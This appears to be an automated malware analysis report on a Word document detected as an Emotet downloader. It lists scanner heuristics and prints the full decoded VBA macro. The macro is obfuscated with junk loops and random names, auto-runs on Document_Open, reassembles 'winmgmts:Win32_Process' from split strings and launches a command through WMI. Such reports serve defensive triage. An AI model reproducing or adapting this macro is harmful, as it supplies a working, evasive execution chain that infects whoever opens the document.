MALICIOUS
292
Risk Score
Heuristics 9
-
ClamAV: Doc.Downloader.Emotet-7445950-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-7445950-0
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATEVBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.Matched line in script
Set Toneavbh = CreateObject(Jzkbsnjupxfbo) -
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATIONVBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.Matched line in script
Set Toneavbh = CreateObject(Jzkbsnjupxfbo) -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set Toneavbh = CreateObject(Jzkbsnjupxfbo) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_open() -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7753 bytes |
SHA-256: 8beca7cafa87211b5c5bc173f3309c952810099a32b155a0aa6085e417631f5a |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
190 of 281 identifiers look randomly generated (e.g. 'Bwkhgfbhpexid') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Tnfihhkold"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "Nxzzxecraqe, 0, 0, MSForms, TextBox"
Private Sub Document_open()
For Lonlcahnwu = Efabmbhyrqa To 0
Olkrqtnlucwt = (13 - Atn(51) - (44 + Round(41) * Pvopmsbezldo / CInt(1)))
Select Case Etvorrnow
Case Bzejddigj
Dbndsklz = CLng(Gigbhibo)
Yrjltxvw = Oct(Hdmaqtaozddx)
Case Uqxivvgr
Fmscjvoorsud = Kohnpaxaj
Cznbmopyvvd = Int(29)
End Select
Next
For Irlztgxwl = Hshuombaatkvb To 0
Rbbyudhvd = (13 - Atn(51) - (44 + Round(41) * Vmjwhzpv / CInt(1)))
Select Case Btwmmksmyvkk
Case Wvnhuzwejnr
Emkgfkmpiel = CLng(Pifppkyvzmmh)
Vxjjvyuo = Oct(Pezbyoqbzck)
Case Txgpuezyzfgqs
Pjxahralkxwl = Iythyqlpjz
Pqztkgqv = Int(29)
End Select
Next
For Xajblukldn = Enqalmyplts To 0
Bedsjwydei = (13 - Atn(51) - (44 + Round(41) * Dyftuflmcsz / CInt(1)))
Select Case Rynryehpp
Case Gstqrjafxkh
Wrnhhjifrksx = CLng(Felbooqmbl)
Ssuoxjkuvhqzh = Oct(Jphbtfxv)
Case Jtzcjpcnlq
Dninrqxomt = Gxukbqvwubo
Smsnmwpkxl = Int(29)
End Select
Next
Gcmadomyup
End Sub
Attribute VB_Name = "Bmbppnxuf"
Attribute VB_Base = "0{7A11953C-AA0C-4E87-9177-77DE18B9B140}{C9A7DE2F-4655-41D6-8EAE-1D5AD8262154}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Tdyszmnvdid"
Function Gmgupsfx()
For Eifzwznd = Rsnniyag To 0
Kabvjiowxiw = (13 - Atn(51) - (44 + Round(41) * Mxjeavsujwsiy / CInt(1)))
Select Case Mjztznsegjqo
Case Fuheuapyual
Adjnlcvknidnk = CLng(Cujhhddcldde)
Pzierrbxwfl = Oct(Sldrjgwvz)
Case Nsxbxjhy
Xjvjscseyewrw = Hmuxgrpieqz
Amxmwjuciiqed = Int(29)
End Select
Next
Eqsgrburihqb = Tnfihhkold.Nxzzxecraqe
For Vxkidmgpgwroy = Tvlrsvaecysxz To 0
Wirsjaqzs = (13 - Atn(51) - (44 + Round(41) * Edlrrvntet / CInt(1)))
Select Case Cbvthjkohy
Case Jwggydvs
Rxtlhxjfm = CLng(Woqohipiw)
Ekiuoguby = Oct(Vjxawbnfb)
Case Tmhpsrugkk
Sidnickkpk = Grgmnuqcturv
Odhsmurxfrtoe = Int(29)
End Select
Next
Kmmppwlxukiud = Eqsgrburihqb + Bmbppnxuf.Desznstht + Bmbppnxuf.Lmdujlerr + Bmbppnxuf.Vuepnmxui
For Cxkdeohnwzavb = Lqyvkhyt To 0
Hseizovtz = (13 - Atn(51) - (44 + Round(41) * Bwkhgfbhpexid / CInt(1)))
Select Case Bttqddjx
Case Dexkfbbsekuoo
Wmlbkkbr = CLng(Bajdvrynld)
Wkdvpzhk = Oct(Ppgrywmlc)
Case Ydbsoisv
Aasqayou = Kywktwetba
Ocyhbdbq = Int(29)
End Select
Next
Unfitkxdgdkb = Kmmppwlxukiud + Bmbppnxuf.Atxilvqeasjdz + Bmbppnxuf.Mpwefpspspmiy.ControlTipText
For Slgjxfcxtecj = Bpklcqlnpkzl To 0
Qgubsqlp = (13 - Atn(51) - (44 + Round(41) * Sdspsqrahlo / CInt(1)))
Select Case Lypgewvjm
Case Gnkaqcfmiwtzx
Ztzdbpjyiddk = CLng(Kefluifgqjfg)
Msyrkjwckjqix = Oct(Wnsysyrn)
Case Npscqyvm
Qelzxwiuwu = Qetvnhkaue
Xueztlvvndl = Int(29)
End Select
Next
Gmgupsfx = Psirofzor + Unfitkxdgdkb + Psirofzor
For Eofgldaguurl = Xkaffsctfh To 0
Pvvfgjjecnkab = (13 - Atn(51) - (44 + Round(41) * Rkfqukheapqo / CInt(1)))
Select Case Liynmnelooh
Case Hjzadlzkizq
Iruqpvaoqem = CLng(Gofvrjsvzub)
Djfcjhpxfnr = Oct(Lbaqennneleni)
Case Uixtacsri
Exsbboxsxrui = Czyyapbzidw
Xwtjscjjpvcjq = Int(29)
End Select
Next
End Function
Function Gcmadomyup()
For Drzmxzpijtkl = Hpmubkld To 0
Funwdnqaqfq = (13 - Atn(51) - (44 + Round(41) * Abyqqqpe / CInt(1)))
Select Case Guhphcghz
Case Hcltfvcjva
Mmtduvmrlvohb = CLng(Ixjyqyusynwkv)
Oftxvdozmmnt = Oct(Odrjxullcv)
Case Tvqxkrergjne
Uyxldfxhkjfa = Jdcyycksjobv
Eeqnjcamo = Int(29)
End Select
Next
Jzkbsnjupxfbo = QWE + "w" + "i" + "nmg" + "mts:Wi" + "n32" + "_P" + "roc" + "ess"
For Jfdtyjfvaeoc = Zdgnmcqgwffk To 0
Dpkixvrnucm = (13 - Atn(51) - (44 + Round(41) * Oalyqzrtchf / CInt(1)))
Select Case Bdjynorsr
Case Ffseljeaincg
Plbtahfvr = CLng(Evoynxwpssk)
Itdefszwyry = Oct(Yqdoknyqhnp)
Case Qfrroeenlhea
Trfeqvwygleiw = Afnckbufhcuyc
Znuofycjzh = Int(29)
End Select
Next
Set Toneavbh = CreateObject(Jzkbsnjupxfbo)
For Pebysvkuo = Icugxemgsq To 0
Mvbebzdtn = (13 - Atn(51) - (44 + Round(41) * Mputgyhsqrrlm / CInt(1)))
Select Case Gaxpqrmxo
Case Rjukrxncirc
Hlxmovjpx = CLng(Cwyehzrgqqhy)
Atxjyneqr = Oct(Uzjttbumc)
Case Zjvjawtpamag
Mgyjomfq = Ahmxpnmvxgt
Pnhwbhstswr = Int(29)
End Select
Next
Rkkopnwmumv = Jzkbsnjupxfbo + "ST" + WE + "ART" + "U"
For Caiqdnnfxw = Sfaavgkas To 0
Isuabrbymqp = (13 - Atn(51) - (44 + Round(41) * Zpgmqiekf / CInt(1)))
Select Case Pqxljnttxma
Case Nmnwyxqcut
Zxkjadcsg = CLng(Uppzwwmuyr)
Dvimhklvwwfjp = Oct(Wixfdcbtgi)
Case Ghycocygosrv
Poykfkompmbm = Ccbdjrfnytrhr
Ercximnuwdnf = Int(29)
End Select
Next
Aepkxfotdf = Rkkopnwmumv + Tnfihhkold.Nxzzxecraqe
For Rbubsipuqbaz = Coadndte To 0
Qguiyugfp = (13 - Atn(51) - (44 + Round(41) * Junlwrjwcyd / CInt(1)))
Select Case Vehdeyxn
Case Lmohvvuvklq
Nrrlkixhncqm = CLng(Dbrzahgczi)
Ahdsrnckulm = Oct(Fdfxjxuajqu)
Case Qlmkrjbwhq
Ldkjsroemvdb = Kpmqqiyfxqy
Dkqxnadyukrq = Int(29)
End Select
Next
Set Gcmadomyup = CreateObject((Aepkxfotdf))
For Dggworcvuzbnq = Ioceoabivpt To 0
Lvukfffun = (13 - Atn(51) - (44 + Round(41) * Gqpijhuxzqk / CInt(1)))
Select Case Zwybxlhubwjzf
Case Klwuqnyyks
Uwqpaxxlihd = CLng(Qveufjeq)
Ntqgiaynjy = Oct(Xlhjbheach)
Case Zstdfjuxjkcv
Pljuuyeextn = Xmljguyhq
Iadadnimzlst = Int(29)
End Select
Next
Gcmadomyup.XSize = Empty * Empty
For Juleqdzobsl = Otoybmifmdp To 0
Lxqtwmqzbkgm = (13 - Atn(51) - (44 + Round(41) * Erzeresxbaqul / CInt(1)))
Select Case Xrvmwrbyhw
Case Rmjhlope
Zxmcovpdbb = CLng(Dtkzqectsit)
Kstfgvlx = Oct(Yaudfieuxccj)
Case Lykcturejbedw
Forsbmzwbwlno = Ybbwuhki
Atqsycmhyrnl = Int(29)
End Select
Next
Gcmadomyup.YSize = Empty * Empty
For Mbfheouzvfgv = Kjfkycmzkb To 0
Gzjiblzsx = (13 - Atn(51) - (44 + Round(41) * Xscyosodx / CInt(1)))
Select Case Fucrpehnr
Case Zhvqmeuw
Mbhswexgvxg = CLng(Uofjvulk)
Usucxfji = Oct(Ptsvztzjgvg)
Case Fbbhuzblf
Nzcbaalpfdmbw = Cucdlwxmob
Pizdkntharyjf = Int(29)
End Select
Next
Do While Toneavbh.Create(Null & Gmgupsfx, Racxlvln, Gcmadomyup)
Loop
For Fttklwhyoto = Geoohdzhedbw To 0
Mardunxwxt = (13 - Atn(51) - (44 + Round(41) * Eelbkdypxn / CInt(1)))
Select Case Spwgaprodmvyw
Case Jxjhvwzzvvdt
Rmyrskfrqvhcd = CLng(Ineujpsnfnc)
Akxwsqlawhd = Oct(Rgnzstthmiy)
Case Izzsdqqprgy
Ntqmfbntxm = Vizhncyxd
Bdempzaapp = Int(29)
End Select
Next
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.